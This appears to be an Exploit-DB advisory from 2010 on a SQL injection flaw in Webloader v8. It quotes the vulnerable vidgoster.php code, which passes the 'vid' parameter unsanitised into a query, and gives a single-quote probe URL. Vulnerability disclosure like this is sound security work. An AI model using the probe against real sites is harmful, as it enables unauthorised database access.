Webloader 8 - SQL Injection

EDB-ID:

12731

CVE:

N/A


Author:

ByEge

Type:

webapps


Platform:

PHP

Date:

2010-05-24


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

[~] Title: Webloader v8 SQL Injection Vulnerability

[~] Date: 16.05.2010

[~] Script Home: www.webloader.org 

[~] Author: ByEge

[~] Homepage: byege.blogspot.com

[~][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][~]


[~] vidgoster.php Bug code :

[~] <?
[~] include 'baglan.php';
[~] $vid=temiz($_GET['vid']);

[~] $c=solcek("select * from webvideo where id=$vid");
[~] $va=solarray($c);

[~] ?>


[~] Example :

[~] http://site.com/vidgoster.php?vid=1'


[~][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][~]

[~] Th4nks : Fantastik, MitolocyA, ISYAN,